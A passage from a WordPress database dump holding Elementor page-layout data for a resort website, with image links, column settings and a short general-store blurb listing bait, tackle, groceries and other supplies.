",\"_id\":\"993ae9c\"}]},\"elements\":[{\"id\":\"2b243da\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":36.214,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b99c65d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d236f1b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"26fba08\"}]},\"elements\":[{\"id\":\"6973f13\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2583.jpg\",\"id\":231}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0399e46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":63.786,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b45d5d6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"42b67f9\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"5fc2a42\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d66129f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b2dfb5c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fc5a2e6\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"63cdaad\"}]},\"elements\":[{\"id\":\"baa84db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":36.523,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2222640\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"483a028\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"91dec69\"}]},\"elements\":[{\"id\":\"9b8fb4b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2766.jpg\",\"id\":459}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"caf4c26\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":63.477,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"dec8e69\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c060f23\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"97656fc\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1903,755,'_wp_page_template','default'),(1904,755,'_elementor_edit_mode','builder'),(1905,755,'_elementor_template_type','post'),(1906,755,'_elementor_version','2.5.12'),(1907,755,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(1908,755,'_elementor_data','[{\"id\":\"cfb3086\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9bb2395\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"bfe9bed\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"7abb36f\"}]},\"elements\":[{\"id\":\"6ec3d7e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.288,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"32b83ea\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ad57fa7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ed2d47a\"}]},\"elements\":[{\"id\":\"2800fb8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3679.jpg\",\"id\":492}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4721f5a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.712,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1b25439\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"4336e00\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d677481\"}]},\"elements\":[{\"id\":\"25ce023\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Forget to pack something you need, just check our store...<\\/strong><\\/p><p><strong>We provide lots of vacation things you need from fishing tackle to food.<\\/strong><\\/p><p>Th<strong>ere are even great fishing stories being told most mornings over a cup of coffee or cappuccino.<\\/strong><\\/p><p><strong>Some of the items available at the store:<\\/strong><\\/p><p><strong><br \\/><\\/strong><strong>Ice,\\u00a0<\\/strong><strong>\\u00a0Bait,\\u00a0<\\/strong><strong>Clothing,\\u00a0<\\/strong><strong>Gas, Groceries, Ice Cream, Pop,\\u00a0Tackle, Toiletries, Water<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bd89908\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1af9162\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8cd473f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"404d4cf\"}]},\"elements\":[{\"id\":\"5504f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.7,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"aa7c034\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"50ec903\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"84fa976\"}]},\"elements\":[{\"id\":\"833009a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2771.jpg\",\"id\":460}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"305e6dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.3,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"4f47843\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"36f8b95\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"fa2b549\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"073999b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8b9f23b\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fb295f3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"993ae9c\"}]},\"elements\":[{\"id\":\"2b243da\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":36.214,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b99c65d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d236f1b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"26fba08\"}]},\"elements\":[{\"id\":\"6973f13\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2583.jpg\",\"id\":231}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0399e46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":63.786,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b45d5d6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"42b67f9\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"5fc2a42\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d66129f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b2dfb5c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fc5a2e6\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"63cdaad\"}]},\"elements\":[{\"id\":\"baa84db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":36.523,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2222640\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"483a028\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"91dec69\"}]},\"elements\":[{\"id\":\"9b8fb4b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2766.jpg\",\"id\":459}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"caf4c26\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":63.477,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"dec8e69\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c060f23\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"97656fc\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1914,756,'_wp_page_template','default'),(1915,756,'_elementor_edit_mode','builder'),(1916,756,'_elementor_template_type','post'),(1917,756,'_elementor_version','2.5.12'),(1918,756,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(1919,756,'_elementor_data','[{\"id\":\"cfb3086\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9bb2395\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"bfe9bed\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"7abb36f\"}]},\"elements\":[{\"id\":\"6ec3d7e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.288,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"32b83ea\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ad57fa7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ed2d47a\"}]},\"elements\":[{\"id\":\"2800fb8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3679.jpg\",\"id\":492}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4721f5a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.712,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1b25439\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"4336e00\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d677481\"}]},\"elements\":[{\"id\":\"25ce023\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Forget to pack something you need, just check our store...<\\/strong><\\/p><p><strong>We provide lots of vacation things you need from fishing tackle to food.<\\/strong><\\/p><p>Th<strong>ere are even great fishing stories being told most mornings over a cup of coffee or cappuccino.<\\/strong><\\/p><p><strong>Some of the items available at the store:<\\/strong><\\/p><p><strong><br \\/><\\/strong><strong>Ice,\\u00a0<\\/strong><strong>\\u00a0Bait,\\u00a0<\\/strong><strong>Clothing,\\u00a0<\\/strong><strong>Gas, Groceries, Ice Cream, Pop,\\u00a0Tackle, Toiletries, Water<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bd89908\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1af9162\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8cd473f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"404d4cf\"}]},\"elements\":[{\"id\":\"5504f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.7,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"aa7c034\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"50ec903\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"84fa976\"}]},\"elements\":[{\"id\":\"833009a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2771.jpg\",\"id\":460}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"305e6dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.3,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"4f47843\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"36f8b95\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"fa2b549\"}]},\"elements\":[{\"id\":\"991ac0d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"073999b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8b9f23b\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fb295f3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"993ae9c\"}]},\"elements\":[{\"id\":\"2b243da\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":36.214,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b99c65d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d236f1b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"26fba08\"}]},\"elements\":[{\"id\":\"6973f13\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2583.jpg\",\"id\":231}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0399e46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":63.786,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b45d5d6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"42b67f9\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"5fc2a42\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d66129f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b2dfb5c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fc5a2e6\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"63cdaad\"}]},\"elements\":[{\"id\":\"baa84db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":36.523,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2222640\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"483a028\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"91dec69\"}]},\"elements\":[{\"id\":\"9b8fb4b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2766.jpg\",\"id\":459}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"caf4c26\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":63.477,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"dec8e69\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c060f23\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"97656fc\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1922,757,'_wp_page_template','default'),(1923,757,'_elementor_edit_mode','builder'),(1924,757,'_elementor_template_type','post'),(1925,757,'_elementor_version','2.5.12'),(1926,757,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(1927,757,'_elementor_data','[{\"id\":\"cfb3086\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9bb2395\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"bfe9bed\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"7abb36f\"}]},\"elements\":[{\"id\":\"6ec3d7e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.288,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"32b83ea\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ad57fa7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ed2d47a\"}]},\"elements\":[{\"id\":\"2800fb8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3679.jpg\",\"id\":492}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4721f5a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.712,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1b25439\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"4336e00\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d677481\"}]},\"elements\":[{\"id\":\"25ce023\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Forget to pack something you need, just check our store...<\\/strong><\\/p><p><strong>We provide lots of vacation things you need from fishing tackle to food.<\\/strong><\\/p><p>Th<strong>ere are even great fishing stories being told most mornings over a cup of coffee or cappuccino.<\\/strong><\\/p><p><strong>Some of the items available at the store:<\\/strong><\\/p><p><strong><br \\/><\\/strong><strong>Ice,\\u00a0<\\/strong><strong>\\u00a0Bait,\\u00a0<\\/strong><strong>Clothing,\\u00a0<\\/strong><strong>Gas, Groceries, Ice Cream, Pop,\\u00a0Tackle, Toiletries, Water<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bd89908\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1af9162\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8cd473f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"404d4cf\"}]},\"elements\":[{\"id\":\"5504f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.7,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"aa7c034\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"50ec903\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"84fa976\"}]},\"elements\":[{\"id\":\"833009a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2771.jpg\",\"id\":460}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"305e6dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.3,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"4f47843\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"36f8b95\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"fa2b549\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"073999b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8b9f23b\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fb295f3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"993ae9c\"}]},\"elements\":[{\"id\":\"2b243da\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":36.214,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b99c65d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d236f1b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"26fba08\"}]},\"elements\":[{\"id\":\"6973f13\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2583.jpg\",\"id\":231}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0399e46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":63.786,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b45d5d6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"42b67f9\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"5fc2a42\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d66129f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b2dfb5c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fc5a2e6\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"63cdaad\"}]},\"elements\":[{\"id\":\"baa84db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":36.523,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2222640\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"483a028\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"91dec69\"}]},\"elements\":[{\"id\":\"9b8fb4b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2766.jpg\",\"id\":459}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"caf4c26\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":63.477,\"eae_s